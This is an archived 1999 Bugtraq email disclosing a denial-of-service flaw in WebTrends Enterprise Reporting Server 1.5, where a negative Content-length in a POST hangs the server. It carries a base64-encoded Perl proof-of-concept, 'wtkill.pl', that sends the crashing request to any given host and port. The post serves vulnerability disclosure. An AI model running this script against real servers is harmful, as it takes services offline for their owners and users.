[11323] in bugtraq
Remote DoS of WebTrends Enterprise Reporting Server
daemon@ATHENA.MIT.EDU (rpc)
Tue Aug 10 00:42:33 1999
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="_=XFMail.1.3.p0.Linux:990808151156:7732=_"
Message-Id: <XFMail.990808151156.jared@antisocial.com>
Date: Sun, 8 Aug 1999 15:11:56 -0000
Reply-To: rpc <jared@ANTISOCIAL.COM>
From: rpc <jared@ANTISOCIAL.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format
--_=XFMail.1.3.p0.Linux:990808151156:7732=_
Content-Type: text/plain; charset=us-ascii
Hi,
WebTrends Enterprise Reporting Server version 1.5 (Linux/Solaris) is vulnerable
to a denial of service attack utilizing the Content-length field passed to
the HTTP daemon. If a negative Content-length is passed to the daemon after a
POST method has been called, the server will stop responding. WebTrends has been
notified and a patch is supposedly in the works. Attached is an example script
to demonstrate the problem.
Version: 1.5 (1.5a has not been tested)
OS: Linux 2.2.x and Solaris (v?)
License: Full
Thanks,
rpc <jared@antisocial.com>
--_=XFMail.1.3.p0.Linux:990808151156:7732=_
Content-Disposition: attachment; filename="wtkill.pl"
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream; name=wtkill.pl; SizeOnDisk=445
IyEvdXNyL2Jpbi9wZXJsIC13CiMgRXhhbXBsZSBEb1MgYWdhaW5zdCBXZWJUcmVuZHMgRW50ZXJw
cmlzZSBSZXBvcnRpbmcgU2VydmVyCiMgOC84Lzk5CiMgcnBjIDxqYXJlZEBhbnRpc29jaWFsLmNv
bT4KCnVzZSBJTzo6U29ja2V0OwoKZGllICJ1c2FnZTogJDAgPGhvc3Q+IDxwb3J0PiIgdW5sZXNz
IChAQVJHViA9PSAyKTsKCigkaG9zdCwgJHBvcnQpID0gQEFSR1Y7CgoKJHMgPSBJTzo6U29ja2V0
OjpJTkVULT5uZXcoUGVlckFkZHI9PiRob3N0LCBQZWVyUG9ydD0+JHBvcnQsIFByb3RvPT4ndGNw
JykgCm9yIGRpZSAiQ2FuJ3QgY3JlYXRlIHNvY2tldC4iOwoKcHJpbnQgJHMgIlBPU1QgL1xyXG4i
OwpwcmludCAkcyAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluXHJcbiI7CnByaW50ICRzICJDb250
ZW50LWxlbmd0aDogLTEiLCAiXHJcbiJ4NTsKCnByaW50ICJkb25lLlxuIjsKCg==
--_=XFMail.1.3.p0.Linux:990808151156:7732=_--
End of MIME message
